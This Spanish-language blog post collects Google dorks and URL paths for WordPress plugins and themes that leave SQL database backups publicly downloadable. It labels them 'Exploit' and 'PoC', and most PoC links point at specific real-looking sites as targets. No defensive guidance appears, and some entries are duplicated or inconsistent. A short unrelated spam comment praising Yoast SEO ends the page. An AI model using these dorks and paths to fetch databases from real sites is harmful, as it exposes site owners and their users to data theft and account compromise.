Temas y Plugins exponen BackUp de bases de datos
Desde hace tiempo, fueron detectas una gran cantidad de vulnerabilidades/fallos en temas y plugins de WordPress los cuales exponen los BackUp de bases de sitios.
En este post, recopilamos una gran cantidad de estos, con Dorks, PoC, y mas informacion de cada fallo.
WordPress user-spam-remover [PLUGINS]
[*] Dorks : inurl:''/wp-content/plugins/user-spam-remover/''[*] Admin Panel Login Path : /wp-login.php
[*] Exploit : /wp-content/plugins/user-spam-remover/log/userspamremover.restore.sql
[*] PoC: howafrica.com/wp-content/plugins/user-spam-remover/log/userspamremover.restore.sql
WordPress Delme Plugins 3.0
[*] Dork: inurl:''/wp-content/plugins/delme/admin/''[*] Admin Panel Login Path : /wp-login.php
[*] Exploit : /wp-content/plugins/delme/admin/help/documentation/database%20schema.sql #
[*] PoC: river-guesthouse.com/wp-content/plugins/delme/admin/help/documentation/database%20schema.sql
WordPress Delme Themes 3.0
[*] Dorks : inurl:''/wp-content/plugins/delme/admin/''[*] Admin Panel Login Path : /wp-login.php
[*] Exploit : /wp-content/plugins/delme/admin/help/documentation/database%20schema.sql
[*] PoC: river-guesthouse.com/wp-content/plugins/delme/admin/help/documentation/database%20schema.sql
WordPress wp-contactpage-designer Plugins
[*] Dorks : inurl:''/wp-content/plugins/wp-contactpage-designer/''[*] Admin Panel Login Path : /wp-login.php
[*] Exploit :
- /wp-content/plugins/wp-contactpage-designer/sql/cpd_elements.sql
- /wp-content/plugins/wp-contactpage-designer/sql/cpd_templates.sql
WordPress zerotolaunch Plugins
[*] Dorks : inurl:''/wp-content/plugins/zerotolaunch/''[*] Admin Panel Login Path : /wp-login.php # Exploit :
- /wp-content/plugins/zerotolaunch/Vendor/php-activerecord/test/sql/mysql.sql
- /wp-content/plugin/zerotolaunch/Vendor/php-activerecord/test/sql/oci-after-fixtures.sql
- /wp-content/plugin/zerotolaunch/Vendor/php-activerecord/test/sql/oci.sql
- /wp-content/plugins/zerotolaunch/Vendor/php-activerecord/test/sql/pgsql-after-fixtures.sql
- /wp-content/plugins/zerotolaunch/Vendor/php-activerecord/test/sql/pgsql.sql
- /wp-content/plugins/zerotolaunch/Vendor/php-activerecord/test/sql/sqlite.sql
WordPress rss-feed-post-generator-echo Plugins
[*] Dorks : inurl:''/wp-content/plugins/rss-feed-post-generator-echo/''[*] Admin Panel Login Path : /wp-login.php
[*] Exploit : /wp-content/plugins/rss-feed-post-generator-echo/res/simplepie/db.sql
[*] PoC: metropolisradio.gr/wp-content/plugins/rss-feed-post-generator-echo/res/simplepie/db.sql
WordPress Universal Post Manager 1.5.0
[*] Google Dorks : inurl:''/wp-content/plugins/universal-post-manager/''[*] Exploit :
- /wp-content/plugins/universal-post-manager/db/db.sql /PATH
- /wp-content/plugins/universal-post-manager/db/db.sql
- /wpblog/wp-content/plugins/universal-post-manager/db/db.sql
- /wordpress/wp-content/plugins/universal-post-manager/db/db.sql
- /backups/sitebuild-backup%2010-25-2011/wp-content/plugins/universal-post-manager/db/db.sql
WordPress wp-contactpage-designer Plugins
[*] Google Dorks : inurl:''/wp-content/plugins/wp-contactpage-designer/''[*] Admin Panel Login Path : /wp-login.php
[*] Exploit :
- /wp-content/plugins/wp-contactpage-designer/sql/cpd_elements.sql
- /wp-content/plugins/wp-contactpage-designer/sql/cpd_templates.sql
WordPress paid-memberships-pro Plugins 1.5.2
[*] Google Dorks : inurl:''/wp-content/plugins/paid-memberships-pro/''[*] Admin Panel Login Path: /wp-login.php
[*] Exploit : /wp-content/plugins/paid-memberships-pro/includes/setup.sql
[*] PoC: naswithnotepads.com/community/wp-content/plugins/paid-memberships-pro/includes/setup.sql
WordPress Pods Plugins 2.7.9
[*] Google Dorks : inurl:/wp-content/plugins/pods/[*] Admin Panel Login Path : /wp-login.php
[*] Exploit : /wp-content/plugins/pods/sql/dump.sql
[*] PoC: oljesaljarna.se/wp-content/plugins/pods/sql/dump.sql
WordPress CherryFramework Themes 3.1.4
[*] Google Dork: inurl:/wp-content/themes/CherryFramework[*] Exploit: wp-content/themes/CherryFramework/admin/data_management/ download_backup.php
[*] PoC: https://www.victim.com/wp-content/themes/CherryFramework/admin/data_management/download_backup.php
WordPress universal-post-manager 1.5.0 Plugin
[*] Google Dorks : inurl:''/wp-content/plugins/universal-post-manager/''[*] Admin Panel Login Path : /wp-login.php
[*] Exploit :
- /wp-content/plugins/universal-post-manager/db/db.sql
- /PATH/wp-content/plugins/universal-post-manager/db/db.sql
- /wpblog/wp-content/plugins/universal-post-manager/db/db.sql
- /wordpress/wp-content/plugins/universal-post-manager/db/db.sql
- /backups/sitebuild-backup%2010-25-2011/wp-content/plugins/universal-post-manager/db/db.sql
WordPress wp-editor Plugins
[*] Google Dork : inurl:''/wp-content/plugins/wp-editor/''[*] Admin Panel Login Path : /wp-login.php
[*] Exploit :
- /wp-content/plugins/wp-editor/sql/database.sql
- /wp-content/plugins/wp-editor/sql/uninstall.sql
- /PATH/wp-content/plugins/wp-editor/sql/database.sql
- /PATH/wp-content/plugins/wp-editor/sql/uninstall.sql
WordPress TemplateOne Themes Dubicars
[*] Dorks :- inurl:''/wp-content/themes/templateone/''
- intext:''© Copyright 2015 | Powered by Dubicars''
- intext:''© Copyright 2017 | Powered by Dubicars''
- intext:''© Copyright 2018 | Powered by Dubicars''
- intext:''Powered by Dubicars''
[*] Exploit : /wp-content/themes/templateone/db.sql
[*] simurghcars.ae/wp-content/themes/templateone/db.sql
WordPress wp-backup-plus Plugin
[*] Google Dork : inurl:''/wp-content/uploads/wp-backup-plus/''[*] Admin Panel Login Path : /wp-login.php
[*] Exploit :
- /wp-content/uploads/wp-backup-plus/temp/database.sql
- /wp-content/uploads/wp-backup-plus/temp/wp_ak_popularity.sql
- /wp-content/uploads/wp-backup-plus/temp/wp_ak_popularity_options.sql
- /wp-content/uploads/wp-backup-plus/temp/wp_ak_twitter.sql
- /wp-content/uploads/wp-backup-plus/temp/wp_amznclicks.sql
- /wp-content/uploads/wp-backup-plus/temp/wp_ar_gwa_leads.sql
- /wp-content/uploads/wp-backup-plus/temp/wp_ar_gwa_lists.sql
- /wp-content/uploads/wp-backup-plus/temp/wp_ar_gwa_msg.sql
- /wp-content/uploads/wp-backup-plus/temp/wp_blr_bad_links.sql
- /wp-content/uploads/wp-backup-plus/temp/wp_commentmeta.sql
- /wp-content/uploads/wp-backup-plus/temp/wp_comments.sql
- /wp-content/uploads/wp-backup-plus/temp/wp_dprv_licenses.sql
- /wp-content/uploads/wp-backup-plus/temp/wp_dprv_post_content_files.sql
- /wp-content/uploads/wp-backup-plus/temp/wp_dprv_posts.sql
- /wp-content/uploads/wp-backup-plus/temp/wp_hitcount.sql
- /wp-content/uploads/wp-backup-plus/temp/wp_jam_feed.sql
- /wp-content/uploads/wp-backup-plus/temp/wp_jam_settings.sql
- /wp-content/uploads/wp-backup-plus/temp/wp_linkizer_link.sql
- /wp-content/uploads/wp-backup-plus/temp/wp_linkizer_post_track.sql
- /wp-content/uploads/wp-backup-plus/temp/wp_linkizer_statistics.sql
- /wp-content/uploads/wp-backup-plus/temp/wp_linkizer_text_track.sql
- /wp-content/uploads/wp-backup-plus/temp/wp_linkizer_track.sql
- /wp-content/uploads/wp-backup-plus/temp/wp_links.sql
- /wp-content/uploads/wp-backup-plus/temp/wp_mban_banner.sql
- /wp-content/uploads/wp-backup-plus/temp/wp_mban_options.sql
- /wp-content/uploads/wp-backup-plus/temp/wp_mban_zone.sql
- /wp-content/uploads/wp-backup-plus/temp/wp_mbp_ping_optimizer.sql
- /wp-content/uploads/wp-backup-plus/temp/wp_mbp_ping_optimizer_int.sql
- /wp-content/uploads/wp-backup-plus/temp/wp_oiopub_affiliates.sql
- /wp-content/uploads/wp-backup-plus/temp/wp_oiopub_affiliates.sql
- /wp-content/uploads/wp-backup-plus/temp/wp_oiopub_affiliates_hits.sql
- /wp-content/uploads/wp-backup-plus/temp/wp_oiopub_affiliates_sales.sql
- /wp-content/uploads/wp-backup-plus/temp/wp_oiopub_config.sql
- /wp-content/uploads/wp-backup-plus/temp/wp_oiopub_coupons.sql
- /wp-content/uploads/wp-backup-plus/temp/wp_oiopub_purchases.sql
- /wp-content/uploads/wp-backup-plus/temp/wp_oiopub_purchases_history.sql
- /wp-content/uploads/wp-backup-plus/temp/wp_oiopub_tracker_archive.sql
- /wp-content/uploads/wp-backup-plus/temp/wp_oiopub_tracker_clicks.sql
- /wp-content/uploads/wp-backup-plus/temp/wp_oiopub_tracker_visits.sql
- /wp-content/uploads/wp-backup-plus/temp/wp_options.sql
- /wp-content/uploads/wp-backup-plus/temp/wp_pay_per_view.sql
- /wp-content/uploads/wp-backup-plus/temp/wp_plb2_data.sql
- /wp-content/uploads/wp-backup-plus/temp/wp_pls.sql
- /wp-content/uploads/wp-backup-plus/temp/wp_pollsa.sql
- /wp-content/uploads/wp-backup-plus/temp/wp_pollsip.sql
- /wp-content/uploads/wp-backup-plus/temp/wp_pollsq.sql
- /wp-content/uploads/wp-backup-plus/temp/wp_popshops.sql
- /wp-content/uploads/wp-backup-plus/temp/wp_popularpostsdata.sql
- /wp-content/uploads/wp-backup-plus/temp/wp_popularpostsdata_backup.sql
- /wp-content/uploads/wp-backup-plus/temp/wp_popularpostsdatacache.sql
- /wp-content/uploads/wp-backup-plus/temp/wp_post_relationships.sql
- /wp-content/uploads/wp-backup-plus/temp/wp_pppm_filter.sql
- /wp-content/uploads/wp-backup-plus/temp/wp_pppm_html.sql
- /wp-content/uploads/wp-backup-plus/temp/wp_pppm_polls.sql
- /wp-content/uploads/wp-backup-plus/temp/wp_pppm_polls_items.sql
- /wp-content/uploads/wp-backup-plus/temp/wp_pppm_polls_votes.sql
- /wp-content/uploads/wp-backup-plus/temp/wp_pppm_protocol.sql
- /wp-content/uploads/wp-backup-plus/temp/wp_pppm_shortcut.sql
- /wp-content/uploads/wp-backup-plus/temp/wp_prestogifto.sql
- /wp-content/uploads/wp-backup-plus/temp/wp_rcp_discounts.sql
- /wp-content/uploads/wp-backup-plus/temp/wp_rcp_payments.sql
- /wp-content/uploads/wp-backup-plus/temp/wp_restrict_content_pro.sql
- /wp-content/uploads/wp-backup-plus/temp/wp_scarcity_samurai_banner_elements.sql
- /wp-content/uploads/wp-backup-plus/temp/wp_scarcity_samurai_banners.sql
- /wp-content/uploads/wp-backup-plus/temp/wp_scarcity_samurai_campaigns.sql
- /wp-content/uploads/wp-backup-plus/temp/wp_scarcity_samurai_counters.sql
- /wp-content/uploads/wp-backup-plus/temp/wp_scarcity_samurai_counters_access.sql
- /wp-content/uploads/wp-backup-plus/temp/wp_scarcity_samurai_page_types.sql
- /wp-content/uploads/wp-backup-plus/temp/wp_scarcity_samurai_pages.sql
- /wp-content/uploads/wp-backup-plus/temp/wp_scarcity_samurai_pages_banners.sql
- /wp-content/uploads/wp-backup-plus/temp/wp_scarcity_samurai_settings.sql
- /wp-content/uploads/wp-backup-plus/temp/wp_scarcity_samurai_tokens.sql
- /wp-content/uploads/wp-backup-plus/temp/wp_scarcity_samurai_users.sql
- /wp-content/uploads/wp-backup-plus/temp/wp_scarcity_samurai_users_subscriptions.sql
- /wp-content/uploads/wp-backup-plus/temp/wp_sharebar.sql
- /wp-content/uploads/wp-backup-plus/temp/wp_spec_comment_log.sql
- /wp-content/uploads/wp-backup-plus/temp/wp_term_relationships.sql
- /wp-content/uploads/wp-backup-plus/temp/wp_term_taxonomy.sql
- /wp-content/uploads/wp-backup-plus/temp/wp_terms.sql
- /wp-content/uploads/wp-backup-plus/temp/wp_usermeta.sql
- /wp-content/uploads/wp-backup-plus/temp/wp_users.sql
- /wp-content/uploads/wp-backup-plus/temp/wp_wpaa_cache.sql
- /wp-content/uploads/wp-backup-plus/temp/wp_wpaa_template.sql
- /wp-content/uploads/wp-backup-plus/temp/wp_wpr_autoresponder_messages.sql
- /wp-content/uploads/wp-backup-plus/temp/wp_wpr_autoresponders.sql
- /wp-content/uploads/wp-backup-plus/temp/wp_wpr_blog_series.sql
- /wp-content/uploads/wp-backup-plus/temp/wp_wpr_blog_subscription.sql
- /wp-content/uploads/wp-backup-plus/temp/wp_wpr_custom_fields.sql
- /wp-content/uploads/wp-backup-plus/temp/wp_wpr_custom_fields_values.sql
- /wp-content/uploads/wp-backup-plus/temp/wp_wpr_followup_subscriptions.sql
- /wp-content/uploads/wp-backup-plus/temp/wp_wpr_newsletter_mailouts.sql
- /wp-content/uploads/wp-backup-plus/temp/wp_wpr_newsletters.sql
- /wp-content/uploads/wp-backup-plus/temp/wp_wpr_queue.sql
- /wp-content/uploads/wp-backup-plus/temp/wp_wpr_subscriber_transfer.sql
- /wp-content/uploads/wp-backup-plus/temp/wp_wpr_subscribers.sql
- /wp-content/uploads/wp-backup-plus/temp/wp_wpr_subscription_form.sql
- /wp-content/uploads/wp-backup-plus/temp/wp_wptwitipid.sql
- /wp-content/uploads/wp-backup-plus/temp/wp_wsc_gocodes.sql
- /wp-content/uploads/wp-backup-plus/temp/wpau_active_plugins_info.sql
- /wp-content/uploads/wp-backup-plus/temp/wpau_upgrade_log.sql
WordPress Absolutely Glamorous Custom Admin ag-custom-admin Plugin
[*] Dork : inurl:''/wp-content/plugins/ag-custom-admin/''[*] Admin Panel Login Path : /wp-login.php
[*] Exploit : /wp-content/plugins/ag-custom-admin/tests/_data/dump.sql
[*] PoC: restaurant-le-lautrec.com/wp-content/plugins/ag-custom-admin/tests/_data/dump.sql
WordPress Education Theme on Genesis Framework 2018
[*] Dork : intext:''Copyright © 2018 ·Education Theme on Genesis Framework · WordPress''[*] Admin Panel Login Path : /wp-login.php
[*] Exploit : /wp-content/uploads/db-backup-1427303159-346f334bc335bdd625cdb032df2b314c.sql [*] PoC: kennethsenglish.com/wp-content/uploads/db-backup-1427303159-346f334bc335bdd625cdb032df2b314c.sql
.png)
.png)
Yoast SEO is a WordPress plug-in designed to help you improve some of the most important on-page SEO factors–even if you aren’t experienced with Web development and SEO. This plug-in takes care of everything from setting up your meta titles and descriptions to creating a sitemap. Yoast even helps you tackle the more complex tasks like editing your robots.txt and .htaccess.
ResponderBorrarSome of the settings may seem a little complex if you’re new to SEO and WordPress, but Yoast created a complete tutorial to help you get everything set up. And the team at WPBeginner made this handy video to help you get set up quickly.